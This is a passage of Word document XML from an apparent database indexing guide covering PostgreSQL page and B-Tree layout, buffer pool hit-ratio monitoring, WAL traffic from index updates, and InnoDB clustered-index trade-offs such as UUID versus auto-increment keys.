    <w:p w14:paraId="5A715EF4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4A54A516" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- 3. Fix the query (if data is already lowercase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E0CCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE email = 'alice@example.com';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D8C61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="661F3301">
          <v:rect id="_x0000_i5334" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F4DC3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Index Internals — What Happens on Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49271A97" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 Page Layout (PostgreSQL Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33EA25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA7EBB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>8 KB Page (PostgreSQL default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCBE5A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌───────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF4442" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Page Header (24 bytes)                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DA6F58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  - LSN, checksum, free space offset, etc. │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE54DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783A9094" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Item Pointers (line pointers, 4 bytes each)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C965FD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  [ptr1] [ptr2] [ptr3] ... [ptrN]         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A8E3A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  (point to actual tuples at bottom)       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F0F87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D37A51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│         Free Space                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4308722E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611391C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Tuples (grow from bottom up)              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC8BE50" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  [tuple3] [tuple2] [tuple1]              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939E66B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└───────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D496B2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B-Tree index page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1115B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6223CDDD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>┌───────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D703A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Page Header + Special (BTree metadata)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE72BD9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A0850" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Item Pointers                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DAECB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD77166" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Index Tuples:                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57260CC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  (key_value, heap_tid)                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C41284" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  (key_value, heap_tid)                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220739F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  ...                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4723FB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  (sorted by key_value)                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663BFB98" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262FE4E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ High key (upper bound for this page)      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166CBD2C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ Right sibling pointer (for range scans)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1F941" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└───────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E41C43" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 Buffer Pool and Index Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D1487" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why indexes should fit in RAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA93EE2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE34A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index in buffer pool (RAM): lookup = 3 page reads × 0.01ms = 0.03ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96A843" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index partially on disk:    lookup = 3 page reads × 0.1ms (SSD) = 0.3ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1D1CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index mostly on disk:       lookup = 3 page reads × 5ms (HDD) = 15ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A9FE7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitoring index buffer pool hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5597B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17768134" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847603D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543CE6B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  indexrelname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35529293" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  idx_blks_hit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDD19E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  idx_blks_read,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF676C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  round(100.0 * idx_blks_hit / nullif(idx_blks_hit + idx_blks_read, 0), 2) as hit_ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F8FF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_statio_user_indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45221E77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ORDER BY idx_blks_read DESC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F7961E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5D46E366" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Target: &gt; 99% hit ratio for all active indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038EAC7B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- If &lt; 95%: either the index is too large for available RAM, or it's cold (rarely used)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137B97CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Write-Ahead Log (WAL) and Index Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B0790" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Every index modification is also written to the WAL (for crash recovery):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DDD75D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9BB92A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>INSERT INTO users(id, email, name) VALUES (42, 'alice@ex.com', 'Alice');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B6ACE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0DDD4611" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WAL records generated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5BCDC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Heap insert: (table=users, page=47, offset=3, data=...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB3717" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. B-Tree insert: (index=idx_email, page=123, key='alice@ex.com', tid=(47,3))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D27DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. B-Tree insert: (index=idx_name, page=456, key='Alice', tid=(47,3))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F90E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="63D676D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Each index = additional WAL traffic → more disk I/O, larger WAL, slower replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599BAD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="55F48A0C">
          <v:rect id="_x0000_i5335" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A0E447" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Advanced Indexing Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68625766" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 Index-Organized Tables (IOT) / Clustered Index Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFDB91" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When data is stored IN the index (InnoDB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5718A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Primary key range scans are maximally efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (data is physically ordered by PK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E598361" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secondary index lookups pay double</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (secondary → PK → data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11E95F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wide primary keys make all secondary indexes larger</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (they store the full PK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19329FC8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sequential insert patterns (auto-increment PK) are ideal</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (appends to the end, no page splits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46286CF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Random insert patterns (UUID PK) cause constant page splits</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> → fragmentation, poor write performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8E0C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UUID vs. Auto-Increment as primary key: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057"/>
        <w:gridCol w:w="3644"/>
        <w:gridCol w:w="3649"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="79EE3B3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03E9BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
